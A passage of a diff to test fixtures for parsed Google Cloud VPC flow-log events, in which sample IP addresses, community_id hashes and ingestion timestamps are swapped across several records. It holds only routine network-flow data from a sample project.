"{\"insertId\":\"198begsfh44xxq\",\"jsonPayload\":{\"bytes_sent\":\"53315\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65275,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"588\",\"reporter\":\"SRC\",\"rtt_msec\":\"82\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.565734921Z", "end": "2019-06-14T03:49:56.316847800Z", @@ -16476,9 +16476,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34450, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -16492,7 +16492,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mjrSMbGpta0wXfm0rttjlUEE5S4=", + "community_id": "1:0xYaSZA1hg8djQzHMsHV0LC9xJY=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -16507,7 +16507,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -16531,8 +16531,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869035600Z", - "original": "{\"insertId\":\"198begsfh44xxz\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":34450,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392092100Z", + "original": "{\"insertId\":\"198begsfh44xxz\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34450,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:47:38.189569840Z", "end": "2019-06-14T03:47:38.299054333Z", @@ -16559,17 +16559,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60122, "bytes": 1467, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:bqmZvpZBw56sKswuSbDTHXnb0TU=", + "community_id": "1:WGg0+cb+0s5Ex6XJLyeCaLPvkpg=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -16583,7 +16583,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -16608,8 +16608,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869038900Z", - "original": "{\"insertId\":\"198begsfh44xxy\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":60122},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392095500Z", + "original": "{\"insertId\":\"198begsfh44xxy\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60122},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:41:39.087226326Z", "end": "2019-06-14T03:41:39.207635184Z", @@ -16632,9 +16632,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 53879, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -16648,7 +16648,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RJnXD8bwo6xYMLMKaPN85qjHcdQ=", + "community_id": "1:AkCFUf83/4ycKxpQQkP7p7l9aqs=", "bytes": 102119, "transport": "tcp", "type": "ipv4", @@ -16663,7 +16663,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -16687,8 +16687,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869042Z", - "original": "{\"insertId\":\"198begsfh44xxu\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":53879,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"176\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392099800Z", + "original": "{\"insertId\":\"198begsfh44xxu\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53879,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"176\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760414869Z", "end": "2019-06-14T03:49:56.312105537Z", @@ -16709,9 +16709,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60968, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -16725,7 +16725,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:FaCnDl7uWc7lOELNsyeufwQIgPc=", + "community_id": "1:E0Auuo+7QQ3cb588odS6yJLxVyU=", "bytes": 1794, "transport": "tcp", "type": "ipv4", @@ -16740,7 +16740,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -16764,8 +16764,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869045100Z", - "original": "{\"insertId\":\"198begsfh44xxo\",\"jsonPayload\":{\"bytes_sent\":\"1794\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":60968,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392104200Z", + "original": "{\"insertId\":\"198begsfh44xxo\",\"jsonPayload\":{\"bytes_sent\":\"1794\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60968,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:43:39.653136947Z", "end": "2019-06-14T03:43:39.777977145Z", @@ -16792,17 +16792,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 60756, "bytes": 1467, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:4doByecCNk4FneiHUzTJOKA7tlc=", + "community_id": "1:uyxwjanUYILl+d9QoxpwFo8pJ48=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -16816,7 +16816,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -16841,8 +16841,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869048200Z", - "original": "{\"insertId\":\"198begsfh44xy0\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":60756},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392107800Z", + "original": "{\"insertId\":\"198begsfh44xy0\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":60756},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:43:10.912193869Z", "end": "2019-06-14T03:43:11.032929292Z", @@ -16871,17 +16871,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65275, "bytes": 67013, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 710 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:HecAvf3EWM638zAmzah9YroP5sc=", + "community_id": "1:pagRMjC+skHhrGE9uXpcDCyM7tk=", "bytes": 67013, "transport": "tcp", "type": "ipv4", @@ -16895,7 +16895,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -16920,8 +16920,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869051300Z", - "original": "{\"insertId\":\"198begsfh44xxw\",\"jsonPayload\":{\"bytes_sent\":\"67013\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65275},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"82\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392111800Z", + "original": "{\"insertId\":\"198begsfh44xxw\",\"jsonPayload\":{\"bytes_sent\":\"67013\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65275},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"82\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.565734921Z", "end": "2019-06-14T03:49:56.316847800Z", @@ -16944,9 +16944,9 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 14236, - "ip": "198.51.100.182" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -16960,7 +16960,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:41kwAuyQ+p5wBn7ppagdhPjfslw=", + "community_id": "1:qXQaZlrUFOCwuROMy7BhHqdjz/0=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -16975,7 +16975,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.182" + "67.43.156.14" ] }, "gcp": { @@ -16996,8 +16996,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869054600Z", - "original": "{\"insertId\":\"198begsfh44xy5\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"198.51.100.182\",\"dest_port\":14236,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:09.257387426Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392116100Z", + "original": "{\"insertId\":\"198begsfh44xy5\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":14236,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:09.257387426Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.247072525Z", "end": "2019-06-14T03:40:09.257387426Z", @@ -17024,18 +17024,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33542, "bytes": 64427, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 351 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VPSH6E9LDgDYoGyFDhfUPu+Qrzg=", + "community_id": "1:o987u+FKYcH8IEcaicIttd58P5M=", "bytes": 64427, "name": "default", "transport": "tcp", @@ -17057,7 +17057,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -17094,8 +17094,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869057600Z", - "original": "{\"insertId\":\"19im82tfdygznq\",\"jsonPayload\":{\"bytes_sent\":\"64427\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392121100Z", + "original": "{\"insertId\":\"19im82tfdygznq\",\"jsonPayload\":{\"bytes_sent\":\"64427\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150870105Z", "end": "2019-06-14T03:49:59.565108524Z", @@ -17122,18 +17122,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 183366, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 242 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:nOR2MzlGdRdAPthTbrK2arYttrs=", + "community_id": "1:rnN2XV4CYsUrxmk67rUeU4blQzU=", "bytes": 183366, "name": "default", "transport": "tcp", @@ -17155,7 +17155,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -17192,8 +17192,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869060700Z", - "original": 